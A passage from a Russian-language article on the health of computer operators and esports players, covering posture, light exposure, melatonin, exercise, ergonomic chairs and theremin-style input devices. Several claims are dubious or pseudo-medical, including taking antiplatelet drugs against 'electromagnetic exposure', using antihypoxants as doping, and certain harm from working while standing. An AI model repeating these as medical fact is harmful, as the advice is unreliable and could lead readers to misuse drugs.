Однако МКМ надавливает ещё на некоторые системы ОДА!

Например на запястья, по которым всегда можно узнать заядлого мышиста/мышевика.

Или на локти, долгие годы статически перегруженные упором рук в столешницу, что вызвало разрастание "воооон той костяной штучки" - с целью увеличить рычаг и таким образом снизить силу статической нагрузки на задействованное сухожилие и мышцу (triceps).

Вся вышеописанная проблематика с ОДА тем более ярко проявится, чем в более раннем возрасте человек начинает баловаться напряжённым операторством за ЭВМ, т.к. до тех пор, пока не завершена оссификация, нагрузки будут проявляться адаптационными деформациями костной тккани. Особенно актуально для астеников!

Кроме того рост оператора также является значимым фактором. Чем длиннее рычаг, тем сильнее гравитация тянет книзу за кончик - стоит лишь чутка ссутулиться.

1.5 Световой режим

Специальные клетки сетчатки глаза при попадании на них яркого света напрямую посылают сигнал в супрахиазматическое ядро. Супрахиазматическое ядро ядро передней области гипоталамуса, главный генератор циркадных ритмов у млекопитающих, управляет выделением мелатонина в эпифизе и синхронизирует работу биологических часов организма.

Мелатонин является индольным производным серотонина и синтезируется ночью. Выработка мелатонина происходит из выработанного на свету днём серотонина, причём более интенсивно на фоне физической активности! Спектр и интенсивность солнечного света невоспроизводимы в быту, следовательно нахождение на свету днём является залогом выработки необходимого количества мелатонина ночью. Однако сон должен происходить в максимально тёмном месте. Пик секреции мелатонина с 11 вечера до 3 утра. В это время человек, желающий сохранить здоровье, обязан спать.

Однако наши незадачливые операторы, как правило, сидят в занавешенных комнатах днём и до поздней ночи светят себе в лица. Ситуация более подробно рассмотрена в 17-ой "Заметке о киберподготовке" (2019) и в работе "Хрестоматийный случай одного гика" (2020).

Мелатонин является индольным производным серотонина и синтезируется ночью.

Секреция мелатонина подчинена суточному ритму, определяющему, в свою очередь, ритмичность гонадотропных эффектов и половой функции. Синтез и секреция мелатонина зависят от освещённости избыток света понижает его образование, а снижение освещённости увеличивает синтез и секрецию гормона (почему, собственно и положено спать в темноте). У человека с нормальным распорядком дня на ночные часы приходится примерно 70% суточной продукции мелатонина.

На свету он не вырабатывается. А вырабатывается в темноте из серотонина!

Который вырабатывается на ярком свету в дневное время.

2. Решения

<sup>Не смотри, что в ранце дыра,- Иди вперёд и кричи: Ура!
(с) Козьма Прутков</sup>

Идеальным решением, безусловно, является отказ от использования ЭВМ (МКМ). Однако в настоящее время уже не только лишь все могут позволить себе такую роскошь не оставшись голодными.

По глубокому убеждения автора, разрешить весь комплекс проблем методом адаптации организма к негативным воздействиям не удастся. Необходимо пересмотреть рабочую среду в целом и её элементы по отдельности.

Пределы адаптационных возможностей организма вкупе с количеством часов в сутках исключают стойкую компенсацию негативных факторов без изменения самой среды.

2.1 Общая хроническая гиподинамия и гипокинезия

<sup>Общая физическая тренированность человека улучшает результаты его профессиональной деятельности. Мобилизующее влияние физической деятельности на рефлекторные и гуморальные механизмы поддержания гомеостаза обеспечивает сохранение высокой работоспособности даже в неблагоприятных условиях внешней среды.</sup>

<sup>Правильная организация внерабочего времени, мышечная активность, занятия физкультурой, закаливание, пребывание на свежем воздухе, регулярное сбалансированное питание самые благоприятные рекомендации, следуя которым можно противостоять неблагоприятным воздействиям, порождённым техническим прогрессом.</sup>

<sup>Двигательная деятельность представляет собой мощный регулятор всех отправлений организма, источник их совершенствования. В физиологическом понимании мышечное движение является основой активной жизнедеятельности организма и его устойчивости к неблагоприятным влияниям.</sup>

<sup>В настоящее время много и справедливо говорят о том, что профессиональная деятельность большинства специалистов характеризуется ограничением двигательной активности (гипокинезией и гиподинамией), которая отрицательно сказывается на здоровье и работоспособности человека. Но дело заключается не только в том, что операторская профессиональная деятельность сопровождается гипокинезией, но и в том, что операторский труд на фоне ограниченных физических нагрузок требует от человека большой нервно-психической напряжённости, которая при частом повторении отрицательно сказывается на состоянии здоровья человека. Компенсация недостающей двигательной активности для специалистов преимущественно информационного типа способствует профилактике (предупреждению) отрицательных последствий чрезмерного эмоционального напряжения, монотонии и гипокинезии.</sup>

<sup>Гипокинезия, эмоциональная напряжённость, монотонность работы своего рода болезнь прогресса, борьба с которыми должна вестись широким фронтом. В этом наступлении на факторы, оказывающие неблагоприятное влияние на здоровье и проиводительность труда, есть место не только врачу, но и физиологу, гигиенисту, психологу, социологу, инженеру-конструктору. Их совместными усилиями осуществляется такая организация трудового процесса, при которой достигается наилучший производственный эффект на фоне наиболее совершенного функционирования организма.</sup>

<sup>Это прежде всего касается рабочего места, пультов и органов управления. Они должны соответствовать антропометрическим и биомханическим показателям работающего человека, физиологическим нормативам статических усилий на органы управления и т. д. Важнейшее значение при этом имеет научно обоснованное распределение функций между машиной и человеком с учётом его психофизиологических и психических возможностей.
(с) Физические нагрузки современного человека НАУКА (1982), В.П.Загрядский, З.К.Сулимо-Самуйлло.</sup>

Бег широкому кругу людей как средство профилактики гиподинамии показан быть не может - в силу своей биомеханической сложности и целому ряду противопоказаний (например таких как плоскостопие). Выбирать нужно ежедневные пешие прогулки не по трассе (не по проезжей части) от 40 минут и отказ от лифта.

Либо, если есть такая возможность, заплывы - от 40 минут и дольше.

2.2 Электромагнитная экспозиция + катионизация вдыхаемого воздуха

Вытяжка воздуха из системных блоков ЭВМ должна производится наружу из рабочего помещения, а не внутрь него. Все источники ЭМ-излучения должны быть по возможности забраны в клетки Фарадея.

От вай-фая следует отказаться в угоду проводам.

В случаях, когда работа проходит в помещениях, где данные условия не соблюдены, стоит обратить внимание на антиагреганты и увеличить потребление чистой питьевой воды.

Антиагреганты должны быть рассмотрены спортсменами в качестве легального допинга.

2.3 Мелкомоторная блокировка дыхания

<sup>Проведённые исследования дали основание для вывода о том, что профессиональное отличие у людей с различной степенью двигательной активности связано не с количеством потребляемого кислорода, а с использованием аэробных возможностей организма, с возможностью длительного поддержания устойчивого состояния функций дыхания и сердечно-сосудистой системы этих транспортных систем организма на протяжении всего трудового процесса. Сонастроенность этих систем, установление оптимальных соотношений между ними непременное условие длительного поддержания высокой работоспособности организма.
(с) Физические нагрузки современного человека НАУКА (1982), В.П.Загрядский, З.К.Сулимо-Самуйлло.</sup>

Операторам, не имеющим возможности отказаться от мыши и клавиатуры в качестве устройств ввода, следует повышать свой аэробный порог - регулярно тренируя свою аэробную выносливость.

Идеальным же решением видится разработка устройств ввода, позволяющих исключить из работы мелкую моторику рук и отвязать сами руки от столешницы. Автор данной работы убеждён, что самыми эффективными, массовыми, простыми в использовании и недорогими могут стать устройства ввода на базе терменвокса. Они не требуют использования сложной оптики - как оптические датчики, а драйвера для таких устройств будут куда проще и "легче".

Как вариант киберспортивного шоу-формата представляется любопытным провести ряд экспериментов на подобных устройствах.

Киберспортсмены, выступающие на МКМ, в связи с МБД, очевидно, обязаны проходить предсоревновательные тренировочные сборы в условиях среднегорья. А провести отпуск в горах будет в целом полезно любому айтишнику.

В распоряжении высококлассной киберспортивной команды не может не быть открытого олимпийского бассейна на горной тренировочной базе, желательно находящейся не ниже 1500м над уровнем моря, где и должны проходить предсоревновательные киберспортивные сборы. Тренировки в условиях среднегорья наиболее эффективны для развития стойкой резистентности к гипоксии. Что перемножается на наиболее эффективно среди циклических видов спорта развиваемую плаванием аэробную выносливость (повышение аэробного порога).

Более того, разгрузка опорно-двигательного аппарата в воде и биомеханическая специфика оставляют плавание вне конкуренции в плане киберподготовки, т.к. киберспортсмены (да и простые операторы ЭВМ), вкупе с гиподинамией и гипокинезией, испытывают постоянную статическую нагрузку на ОДА.

См.: Агаджанян Н.А., Миррахимов М.М. Горы и резистентность организма. М., "Наука", 1970

Допинговаться по этому пункту следует антигипоксантами.

* * *

Застой лимфотока прекрасно ликвидируется ежедневным использованием старой доброй мочалки из люффы.

2.4 Опорно-двигательный аппарат

Как уже сказано выше, использование мыши и клавиатуры в качестве устройств ввода не позволит в полной мере исключить описанную в пункте 1.4 проблематику.

Силовые упражнения с отягощениями противопоказаны сколиотикам, о чём можно подробнее прочесть в работе "Родитель, бди - киберспорт!" (2018). Обычные, симметричные силовые упражнения только закрепляют деформацию мышечным корсетом. Корректировка осанки должна производится методами ЛФК. И такие упраженения, как правило, асимметричны.

Противопоказаны ещё и потому, что будучи хроническим гиподинамиком и обладая ожиревшей от малоподвижности печенью, утилизировать такое количество силовых метаболитов не отравившись не удастся.

Операторам, которые ещё не имеют в своём распоряжении устройств ввода на базе терменвокса, следует адаптировать своё текущее рабочее место таким образом, чтобы т.н. "профессиональное игровое кресло" заработало со своей максимальной отдачей - по возможности снимая гравитационную нагрузку с позвоночника и передавая её на спинку. Ключ к проблеме - положение позвоночника относительно гравитационного вектора.

Близким к идеальному креслом такого типа следует считать зубоврачебное, которое как раз изначально проектировалось для длительных неподвижных отсидок пациента.

В это связи нужно также учитывать, что если мы планируем перестать пастись в монитор, то он в принципе должен находиться выше линии горизонта (линии глаз).

Людям, не имеющим возможности поднять монитор выше линии глаз и опереться затылком, слеует искать надёжной опоры лбом - каковая выстроит всю биомеханику от кресца до затылка. Иллюстрация не приводится, т.к. иллюстратор, к сожалению, сбежал с деньгами, выделенными на иллюстрирование данной статьи.

Ещё одним, более дорогим, вариантом может стать сухая иммерсионная ванна, однако она предъявляет более высокие требования к внепроизводственной физической активности, т.к. дегенерация и детренировка ССС и ОДА в ней происходит гораздо быстрее.

На взгляд автора рекомендация работать стоя за компьютером является злостным вредительством, т.к. гипертония, варикозное расширение вен ног и тромбофлебит в такой ситуации вопрос пары лет!

Единственный вариант, при котором такая поза допустима в течении продолжительного времени - это когда под стол установлена беговая дорожка, включенная на малый ход. Это позволяет ликвидировать венозный и лимфатический застой в нижних конечностях, кроме того большинство критических статических мышечных зажимов превращаются в малоамплитудные движения.

Однако проблематика длительной повседневной работы в таком режиме остаётся дискуссионной и без проведения длительного эксперимента автору данной работы не ясна. Например специфика мелкой моторики, или прецессионная нагрузка на зрительный анализатор.

Автор благодарит экспериментатора за отчёт.

У оператора ЭВМ не может не быть круглосуточного доступа к горизонтальной перекладине (турнику), на которой он в состоянии висеть не доставая ногами до опоры. В течении дня необходимо осуществлять не менее 5 висов максимальной продолжительности, в процессе которых неплохо было бы пораскачиваться, поизвиваться и подрыгаться - максимально снимая компрессию с позвоночника. Продолжительность виса будет постепенно возрастать с укреплением кистевого хвата. Кроме того в отстутствии гимнастических брусьев и их аналогов имеет смысл вставать в упор руками на уровне пояса с одновременным расслаблением (отпусканием) ног - с целью максимальной декомпрессии и расслабления поясничного отдела.

Поясница айтишника нуждается не в дополнительной статической нагрузке, а наоборот в разгрузке. Статические упражнения типа планки в этом смысле представляются не вполне желательными. Наш интерес в растяжке, висах, упорах (как на брусьях) и динамических упражнениях, которые позволят расслабить межпозвоночные (глубокие) мышцы, а не напрячь их больше по другому вектору. Статические зажимы ведут к ухудшению кровообращения в области мышечные спазмы блокируют микроциркуляцию читай питание хрящей. То есть межпозвоночных дисков! Лучшее динамическое упражнение, позволяющее расслабить мышцы низа спины (в т.ч. некоторые не контролируемые сознательно межпозвонковые) это длительное ползание на четвереньках!

Беда в нашем случае ещё и в том, что укрепление мышц, в связи со спецификой деятельности, значения не имеет. От длительных статических нагрузок плывут хрящи и связки, а затем и кости. Восемь часов выпаса в монитор невозможно компенсировать зарядочкой, хотя она, безусловно, и улучшит питание хрящей (межпозвоночных дисков) и они деформируются вполне здоровыми. Потому автор данной работы настаивает на том, что наш путь не другая или дополнительная нагрузка, а разгрузка. В связи с чем требуется коренной пересмотр эргономики рабочего места и устройств ввода-вывода. Наша цель снять статическое напряжение опорой, а не изменить его локализацию!

В целом любая эргономика должна плясать от биомеханики, анатомии и физиологии. Нужно не пытаться компенсировать нагрузку на организм, превосходящую его адаптационные возможности, а трансформировать среду то есть ликвидировать саму превышающую нагрузку.

Технологии для человека, а не человек для технологий! Техника под задачу, а не задача под технику!

Киберспорт - флагман айтишной эргономики и устройств ввода-вывода!

2.5 Световой режим

Запас серотонина, из которого ночью выработается мелатонин, должен быть наработан днём! Интенсивными физическими упражнениями или, хотя бы, прогулками на солнце. В таком случае ночной сон будет крепким, сладким и весьма оздоравливающим. Причём даже в пасмурный день интенсивность света и его спектр на улице не могут быть компенсированы искусственными источниками в помещении.

Формула проста, но, вместе с тем, не терпит и отступлений.

1) Длительное пребывание на дневном свету.

2) Своевременный ночной сон в полной темноте. (с 11 вечера)

В противном случае не нарабатывается достаточное количество серотонина. Следовательно не из чего выработаться и мелатонину в ночное время, вне зависимости от того, насколько темна ваша "берлога".

Кроме того, серотонин участвует в регуляции сосудистого тонуса. Что особенно актуально для нас в свете проблематики, описанной в других пунктах! Желающие глубже вникнуть в механизм приглашаются к ознакомлению с работой Кардиотропные свойства эпифизарного мелатонина (2016):

<sup>В основе кардиотропных эффектов МТ лежит, очевидно, в первую очередь, его прямое влияние на сократимые элементы миокарда через заложенные здесь МТ рецепторы.</sup>

<sup>Кардиопротективное действие МТ определяется несколькими механизмами, среди которых ведущим следует признать антиоксидантный эффект, направленный на ослабление проявлений оксидантного стресса. Ишемическое (при ишемии-реперфузии) и токсическое (под влиянием адриамицина или доксорубицина) повреждение миокарда неизменно сопровождается резким усилением свободно радикальных процессов (Morishima et al., 1999; Salie et al., 2001; Xu et al., 2002). Между тем, как уже неоднократно описывалось ранее, эпифизарный гормон разными путями ограничивает подобные нарушения, будучи одним из наиболее мощных эндогенных антиоксидантов. За счёт лёгкого проникновения в клетки он может выступать в роли ловушки свободных радикалов, обеспечивая защиту макромолекул, в том числе ДНК, от повреждения, а по способности подавлять процессы перекисного окисления липидов и усиливать активность ферментов антиоксидантной системы превосходит аскорбиновую кислоту. Необходимо подчеркнуть универсальность антиоксидантных свойств МТ, которые проявляются независимо от причины, вызвавшей оксидантный стресс. Так, изопротеренол инициировал перекисное окисление липидов в миокарде со снижением уровня глутатиона. Эти сдвиги сопровождались нарушением насосной функции сердца у крыс. МТ (в дозе 10 мг/кг) полностью блокировал указанные эффекты, обеспечивая тем самым выраженное кардиопротективное действие.</sup>

Послесловие

Тренеры сегодня, к сожалению, продолжают тренировать опираясь на педагогические принципы в большинстве своём разработанные в прошлом веке под совершенно другие задачи. И опираясь на научные данные того времени. Зачастую такие педагогические методики не имеют достаточного биологического обоснования

Такие тренеры для сегодняшнего спорта и физкультурной реалибитации малопригодны.

Задача как тренера, так и спортсмена, прежде всего, взяться за книжки и перечитать всё по прфоильным и смежным направления - через то став гармотнее. Знакомство с такой литературой расширяет кругозор тренера и спортсмена, помогая понять какие методы тренировки лучше, а какие хуже - или вовсе необоснованы.

Слишком простые модели организма некорректны. В основе таких моделей, прежде всего, должна лежать информация о биохимиеских и физиологических процессах в организме протекающих. Тренироваться нужно по законам биологии.

Методы тренировок и контроля должны строиться на основе объективных фундаментальных данных и опираться на понимание адаптационных процессов, протекающих в организме. В противном случае горы перепачканной буквами макулатуры будут расти - заполоняя архивы, а достижения спортсменов будут продолжать строиться на достижениях зарубежной фармакологии

П.С.

Немного романтики для усталого айтишника!

Ши Цзюньу Собрание истинных записей бессмертных с гор Сишань. (~1100-1135 гг. н.э.)

Убежищем дыхания* является телесная форма. Упражняя телесную форму образуют дыхание. Если же не знать приёмов питания телесной формы, тогда запасы семени и души-по будут рассеяны и истрачены, в результате чего в пустоте сохранится только иньская оболочка, и человек, даже не дойдя до смерти, будет подобен сухому дереву. А когда дыхание его совсем прервётся, от него останется лишь кучка праха. Так разве можно не уделять большого внимания Пути питания телесной формы?

<sup>*под дыханием в данном случае понимаются все обменные процессы организма в целом</sup>

Литература

Агаджанян Н.А., Миррахимов М.М. "Горы и резистентность организма." М., Наука, 1970.

Аринчин Н.И. "Периферические "сердца" человека" (1988)

Аринчин Н.И., Борисевич Г.Ф. "Микронасосная деятельность скелетных мышц при их растяжении" (1986)

Арушанян Э.Б., Ованесов К.Б. "Кардиотропные свойства эпифизарного мелатонина" (2016)

Загрядский В.П., Сулимо-Самуйлло З.К.. Физические нагрузки современного человека НАУКА (1982),

Зюбан Д.И. "Биофизические характеристики эритроцитов при воздействии на организм производственных факторов механической и электромагнитной природы" М. (1994)

Пиротти Е.Л. "О влиянии электромагнитных полей на свойства эритроцитов" (1997)

Чижевский А.Л. "Электрические и магнитные свойства эритроцитов" (1973)

2018 Родитель, бди киберспорт!

2019 Заметки о киберподготовке

2019 Мелкомоторная блокировка дыхания в компьютерном спорте (МКМ)

2019 Проблемы подготовки спортивного резерва в компьютерном спорте

2020 Хрестоматийный случай одного гика

2020 Говорит и показывает Ишутин